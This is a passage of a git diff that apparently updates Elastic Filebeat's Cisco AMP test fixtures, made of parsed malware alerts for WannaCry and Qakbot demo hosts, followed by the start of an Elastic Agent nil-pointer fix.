], + "cisco.amp.connector_guid": "test_connector_guid", + 
"cisco.amp.detection_id": "6419214500913741856", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1642,10 +2157,9 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 178000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 709000000, + "event.action": "Threat Quarantined", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", @@ -1653,23 +2167,14 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", - "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "file.name": "mssecsvc.exe", - "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 43279, + "log.offset": 45976, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "db349b97c37d22f5ea1d1841e3c89eb4", - "e889544aff85ffaf8b0d0da705105dee7c97fe26" + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1678,9 +2183,6 @@ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -1688,7 +2190,7 @@ ] }, { - "@timestamp": "2021-01-14T13:43:32.000Z", + "@timestamp": "2021-01-14T13:43:30.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", 
@@ -1699,9 +2201,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", - "cisco.amp.detection_id": "6419214500913741856", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection_id": "6419214488028839966", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1709,32 +2210,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 163000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 447000000, + "event.action": "Threat Quarantined", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419214500913742000, + "event.id": 6419214492323807000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", - "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "file.name": "mssecsvc.exe", - "file.path": "C:\\WINDOWS\\mssecsvc.exe", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 44631, + "log.offset": 47096, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "db349b97c37d22f5ea1d1841e3c89eb4", - "e889544aff85ffaf8b0d0da705105dee7c97fe26" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1743,9 +2236,6 @@ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -1753,7 +2243,7 @@ ] }, { - "@timestamp": "2021-01-14T13:43:30.000Z", + "@timestamp": "2021-01-14T13:43:29.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", 
@@ -1764,33 +2254,50 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", "cisco.amp.detection_id": "6419214488028839966", - "cisco.amp.event_type_id": 553648143, + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 447000000, - "event.action": "Threat Quarantined", + "cisco.amp.timestamp_nanoseconds": 916000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419214492323807000, + "event.id": 6419214488028840000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 47096, + "log.offset": 48216, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 5580, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" 
@@ -1799,6 +2306,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2021,6 +2531,69 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204910251769881", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 34000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 54407, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T13:06:18.000Z", "cisco.amp.computer.active": true, 
@@ -2367,6 +2940,122 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204905956802580", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 286000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 63166, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + 
"ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 64439, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T13:06:17.000Z", "cisco.amp.computer.active": true, diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json index b1d52f25c8a8..3e3f7423594d 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json 
@@ -475,6 +475,73 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T12:57:45.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411462918168117252", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 573000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411462918168117000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "a97fb86da4e010974860e5024137b56b", + "file.hash.sha1": "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12", + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9881, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "a97fb86da4e010974860e5024137b56b", + "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T12:32:14.000Z", 
"cisco.amp.computer.active": true, @@ -884,6 +951,59 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T12:02:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d1:e2:b6:61:ef:7a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411444887895408641", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d1:e2:b6:61:ef:7a" + ], + "cisco.amp.timestamp_nanoseconds": 772000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411444887895409000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_2", + "host.name": "Demo_Qakbot_2", + "input.type": "log", + "log.offset": 20427, + "related.hash": [ + "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62" + ], + "related.hosts": [ + "Demo_Qakbot_2" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T11:58:57.000Z", "cisco.amp.computer.active": true, 
@@ -939,6 +1059,75 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T11:58:57.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419187549993959449", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 193000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187549993959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 22729, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 2980, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + 
"service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T11:58:54.000Z", "cisco.amp.computer.active": true, @@ -1012,6 +1201,59 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T11:58:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419187537109057560", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 884000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187537109058000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25859, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T11:49:08.000Z", "cisco.amp.computer.active": true, 
@@ -1221,6 +1463,69 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T11:28:45.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.FCE5B6784D-100.SBX.TG", + "cisco.amp.detection_id": "6533671595485954049", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 899000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671595485954000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "5df0c4ebca109779dc8afc745d612637", + "file.hash.sha1": "bdb11107a33eaeded6a838eb2a0e6167637dbe9c", + "file.hash.sha256": "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "file.name": "pp32.exe", + "file.path": "\\\\?\\C:\\pp32.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 31671, + "related.hash": [ + "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "5df0c4ebca109779dc8afc745d612637", + "bdb11107a33eaeded6a838eb2a0e6167637dbe9c" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T11:26:38.000Z", "cisco.amp.computer.active": true, 
@@ -1276,6 +1581,69 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T11:26:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179222052372503", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 437000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179222052372000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 34184, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T11:26:37.000Z", "cisco.amp.computer.active": true, 
@@ -1441,6 +1809,69 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179217757405206", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 797000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 39029, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T11:26:37.000Z", "cisco.amp.computer.active": true, 
@@ -1931,6 +2362,79 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419179204872503300", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 894000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 50398, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 3020, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T10:59:33.000Z", "cisco.amp.computer.active": true, From c2b70d015b0b7ac8feae5909fc54ab77f20d929d Mon Sep 17 00:00:00 2001 From: Michal Pristas Date: Thu, 25 Mar 2021 17:09:23 +0100 Subject: [PATCH 14/20] [Ingest Manager] Fix nil pointer for nil list item (#24760) (#24766) [Ingest Manager] Fix nil pointer for nil list item (#24760) --- x-pack/elastic-agent/CHANGELOG.next.asciidoc | 1 + .../pkg/agent/program/testdata/single_config.yml | 2 ++ x-pack/elastic-agent/pkg/agent/transpiler/ast.go | 7 +++++++ 3 files changed, 10 insertions(+) diff --git a/x-pack/elastic-agent/CHANGELOG.next.asciidoc b/x-pack/elastic-agent/CHANGELOG.next.asciidoc index 2a2e6184c8b3..e6d73a788fb3 100644 --- a/x-pack/elastic-agent/CHANGELOG.next.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.next.asciidoc @@ -44,6 +44,7 @@ - Fix docker enrollment issue related to Fleet Server change. {pull}24155[24155] - Improve log on failure of Endpoint Security installation. {pull}24429[24429] - Verify communication to Kibana before updating Fleet client. {pull}24489[24489] +- Fix nil pointer when null is generated as list item. {issue}23734[23734] ==== New features diff --git a/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml b/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml index fb585dae996f..006db1e9f524 100644 --- a/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml +++ b/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml @@ -40,6 +40,8 @@ inputs: use_output: default streams: - metricset: status + processors: + - null data_stream: dataset: docker.status - metricset: info 
diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/ast.go b/x-pack/elastic-agent/pkg/agent/transpiler/ast.go
